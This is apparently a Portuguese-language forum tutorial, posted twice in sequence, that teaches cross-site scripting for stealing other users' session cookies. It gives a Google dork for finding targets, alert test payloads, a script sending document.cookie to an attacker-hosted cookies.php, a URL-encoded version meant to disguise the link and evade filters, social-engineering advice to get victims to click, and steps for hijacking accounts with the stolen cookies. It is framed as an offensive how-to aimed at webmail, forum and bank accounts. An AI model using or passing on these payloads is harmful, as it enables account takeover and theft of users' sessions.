XSS – (Cross Site Scripting) Guia Definitivo
Bom, esses dias andei pesquisando no Fórum sobre XSS, porém encontrei pouco material sobre esse assunto, então decidi fazer este tópico, tentando ser o mais objetivo possível, juntei várias matérias, e coloquei um pouco do meu dedo no meio. OBS: Fontes no fim da página!
Vamos lá:
Introdução
XSS (Cross Site Scripting) É uma falha muito conhecida e utilizada por hackers para obter vantagens em um sistema baseado em Web. Mesmo esta técnica já sendo de conhecimento geral, uma boa parte dos sistemas ainda está sujeito à falhas desse gênero.
XSS é uma técnica utilizada para roubar sessões (cookies) em uma aplicação web. Ela consiste na injeção de tags html e comandos Java script em alguma função de um sistema, sendo assim tornando possível obter sessões de outros usuários sem a necessidade de se ter autorização para tal. Em outras palavras: Seria possível entrar em um webmail, fórum, livro de visitas e até mesmo um banco on-line sem a necessidade de se saber a senha do alvo. Esta técnica oferece alto risco a um usuário alvo tendo em vista que informações sensíveis poderão ser descobertas caso a falha exista.
Encontrando vulnerabilidades XSS
Para encontrar vulnerabilidades XSS, devemos iniciar procurando em Blogs, Fóruns, Caixas de texto para mensagens, comentários, busca, e etc; há muitas possibilidades onde podemos encontrar esse tipo de campo, no qual podemos entrar com dados.
Podemos utilizar o Google para facilitar nossa busca. Por exemplo, se digitarmos no campo de busca do Google a linha inurl:"search.php?q=" teremos como retorno um número imenso de resultados encontrados, para encontrarmos alguns alvos para o ataque.
Básico do XSS
Vamos começar a aprender agora alguma coisa dos métodos XSS utilizados atualmente e o tipo de XSS Injection mais utilizado é:
Esse código fará com que uma caixa de mensagem de alerta, com "XSS" escrito nela, apareça na tela.
Esse código retorna o cookie atual da sessão aberta.
Então, retornando ao tópico anterior, vamos lembrar que uma das páginas, contidas em websites, que mais facilmente podemos encontrar é o search.php?q= . Depois de encontrado um site com esse tipo de página, vamos simplesmente tentar o seguinte: digite após o sinal de = o código <script>alert("XSS")</script>
A URL na barra de endereço do browser ficará assim:
Há grandes chances de esse método funcionar, mas não se preocupe se isso não ocorrer.
Apenas tente em outro site, ou leia este tutorial para burlar os filtros de XSS:
Explorando as Vulnerabilidades
Ok descobrimos que o site está vulnerável a XSS, mas mostrar apenas uma mensagem na tela não vai adiantar muita coisa.. Vejamos abaixo um script malicioso para roubar cookies dos usuários e até mesmo do administrador do site.
O script acima tem como objetivo enviar o cookie da sessão atual do usuário alvo, via parâmetro para o arquivo “cookies.php”.
OBS.: O arquivo "cookies.php" estarei disponibilizando para download no fim do tópico!
Inserindo o script acima em nossa url vulnerável, ficaria assim:
Pronto, dessa maneira podemos já obter os cookies dos nossos alvos, porém, uma URL dessa maneira faz com que o usuário pense duas vezes antes de acessá-lo, podemos mascarar esse
script, transformando-o no seguinte aspecto:
Site para codificação acima: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O aspecto acima além de disfarçar um pouco e ser mais atraente, é capaz de burlar filtros XSS, veja o tutorial que citei anteriormente, é de extrema importância que tenha entendido como burlar os filtros de XSS, se não você pode acabar ficando pelo meio do caminho.
Tutorial: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O que fazer com os cookies?
Após usar um pouco da sua engenharia social e fazer com que alguns usuários clicassem na URL maliciosa, ao acessar o seu site onde foi hospedado o arquivo “cookies.php”, você irá observar que foi criado um novo arquivo chamado “cookies.html” contendo algumas informações da vítima, observe a imagem abaixo:
Agora basta executar o comando: javascript:void(document.cookie="") no seu navegador, para alterar o seu cookie, transformando-o para os cookies que você conseguiu obter. Exemplo utilizando a imagem acima:
OBS.: Para cada ponto e virgula “ ; “ você deve executar um novo script, a seguinte maneira não irá funcionar:
Feito isso, basta você dar um Refresh “F5” e vualá, você estará logado na conta da sua vítima. Caso não funcione, copie todo o cookie, lembrando que para cada ponto e vírgula você deve executar um novo script!
Considerações Finais
Bom, creio que com isso vocês já tenham uma base boa para aprimorarem suas técnicas, não existe somente essa forma de XSS que citei, a de roubar cookies, com XSS você pode criar formulários em uma página vulnerável, e conseguir informações pessoais, que estão além das contidas em um simples cookie. Basta usar sua imaginação, pois isso é apenas o ponta pé inicial!
TÓPICOS DO FÓRUM PARA ESTUDO:
(O que fazer com os cookies do xss?) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Ataques Cross-Site Scripting) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Burlando Filtros de XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Falha em HOTWORDS (XSS em Forums) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Defacer com XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Entenda XSS de uma vez por todas) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(o que é xss?) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
DESTAQUES:
(Vídeo aula sobre XSS, recomendo) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Pentest XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
FONTES:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Todos os tópicos que citei anteriormente contribuiram para este tópico, então vale salientar que os mesmos fazem parte da FONTE!
DOWNLOAD:
cookies.php: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Site FREE, ótimo para hospedagem de arquivos PHP.
Espero que gostem, abraços!
Bom, esses dias andei pesquisando no Fórum sobre XSS, porém encontrei pouco material sobre esse assunto, então decidi fazer este tópico, tentando ser o mais objetivo possível, juntei várias matérias, e coloquei um pouco do meu dedo no meio. OBS: Fontes no fim da página!
Vamos lá:
Introdução
XSS (Cross Site Scripting) É uma falha muito conhecida e utilizada por hackers para obter vantagens em um sistema baseado em Web. Mesmo esta técnica já sendo de conhecimento geral, uma boa parte dos sistemas ainda está sujeito à falhas desse gênero.
XSS é uma técnica utilizada para roubar sessões (cookies) em uma aplicação web. Ela consiste na injeção de tags html e comandos Java script em alguma função de um sistema, sendo assim tornando possível obter sessões de outros usuários sem a necessidade de se ter autorização para tal. Em outras palavras: Seria possível entrar em um webmail, fórum, livro de visitas e até mesmo um banco on-line sem a necessidade de se saber a senha do alvo. Esta técnica oferece alto risco a um usuário alvo tendo em vista que informações sensíveis poderão ser descobertas caso a falha exista.
Encontrando vulnerabilidades XSS
Para encontrar vulnerabilidades XSS, devemos iniciar procurando em Blogs, Fóruns, Caixas de texto para mensagens, comentários, busca, e etc; há muitas possibilidades onde podemos encontrar esse tipo de campo, no qual podemos entrar com dados.
Podemos utilizar o Google para facilitar nossa busca. Por exemplo, se digitarmos no campo de busca do Google a linha inurl:"search.php?q=" teremos como retorno um número imenso de resultados encontrados, para encontrarmos alguns alvos para o ataque.
Básico do XSS
Vamos começar a aprender agora alguma coisa dos métodos XSS utilizados atualmente e o tipo de XSS Injection mais utilizado é:
Código:
<script>alert("XSS")</script>
Código:
<script>alert(document.cookie)</script>
Então, retornando ao tópico anterior, vamos lembrar que uma das páginas, contidas em websites, que mais facilmente podemos encontrar é o search.php?q= . Depois de encontrado um site com esse tipo de página, vamos simplesmente tentar o seguinte: digite após o sinal de = o código <script>alert("XSS")</script>
A URL na barra de endereço do browser ficará assim:
Código:
http://site.com/search.php?q=<script>alert("XSS")</script>
Apenas tente em outro site, ou leia este tutorial para burlar os filtros de XSS:
- Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Explorando as Vulnerabilidades
Ok descobrimos que o site está vulnerável a XSS, mas mostrar apenas uma mensagem na tela não vai adiantar muita coisa.. Vejamos abaixo um script malicioso para roubar cookies dos usuários e até mesmo do administrador do site.
Código:
<script>document.location=("http://seusite.com.br/cookies.php?c=")+document.cookie</script>
OBS.: O arquivo "cookies.php" estarei disponibilizando para download no fim do tópico!
Inserindo o script acima em nossa url vulnerável, ficaria assim:
Código:
http://site.com/search.php?q=<script>document.location=("http://seusite.com.br/cookies.php?c=")+document.cookie</script>
script, transformando-o no seguinte aspecto:
Código:
http://site.com/search.php?q=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%28%22%68%74%74%70%3A%2F%2F%73%65%75%73%69%74%65%2E%63%6F%6D%2E%62%72%2F%63%6F%6F%6B%69%65%73%2E%70%68%70%3F%63%3D%22%29%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
O aspecto acima além de disfarçar um pouco e ser mais atraente, é capaz de burlar filtros XSS, veja o tutorial que citei anteriormente, é de extrema importância que tenha entendido como burlar os filtros de XSS, se não você pode acabar ficando pelo meio do caminho.
Tutorial: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O que fazer com os cookies?
Após usar um pouco da sua engenharia social e fazer com que alguns usuários clicassem na URL maliciosa, ao acessar o seu site onde foi hospedado o arquivo “cookies.php”, você irá observar que foi criado um novo arquivo chamado “cookies.html” contendo algumas informações da vítima, observe a imagem abaixo:
Agora basta executar o comando: javascript:void(document.cookie="") no seu navegador, para alterar o seu cookie, transformando-o para os cookies que você conseguiu obter. Exemplo utilizando a imagem acima:
Código:
javascript:void(document.cookie="tp_login=teste@gmail.com")
javascript:void(document.cookie="tp_senha=ec056fc60a448d322f67bf75cb09a16f")
Código:
javascript:void(document.cookie="tp_login=teste@gmail.com; tp_senha=ec056fc60a448d322f67bf75cb09a16f")
Considerações Finais
Bom, creio que com isso vocês já tenham uma base boa para aprimorarem suas técnicas, não existe somente essa forma de XSS que citei, a de roubar cookies, com XSS você pode criar formulários em uma página vulnerável, e conseguir informações pessoais, que estão além das contidas em um simples cookie. Basta usar sua imaginação, pois isso é apenas o ponta pé inicial!
TÓPICOS DO FÓRUM PARA ESTUDO:
(O que fazer com os cookies do xss?) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Ataques Cross-Site Scripting) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Burlando Filtros de XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Falha em HOTWORDS (XSS em Forums) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Defacer com XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Entenda XSS de uma vez por todas) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(o que é xss?) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
DESTAQUES:
(Vídeo aula sobre XSS, recomendo) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(Pentest XSS) Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
FONTES:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Todos os tópicos que citei anteriormente contribuiram para este tópico, então vale salientar que os mesmos fazem parte da FONTE!
DOWNLOAD:
cookies.php: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Site FREE, ótimo para hospedagem de arquivos PHP.
Espero que gostem, abraços!
Comment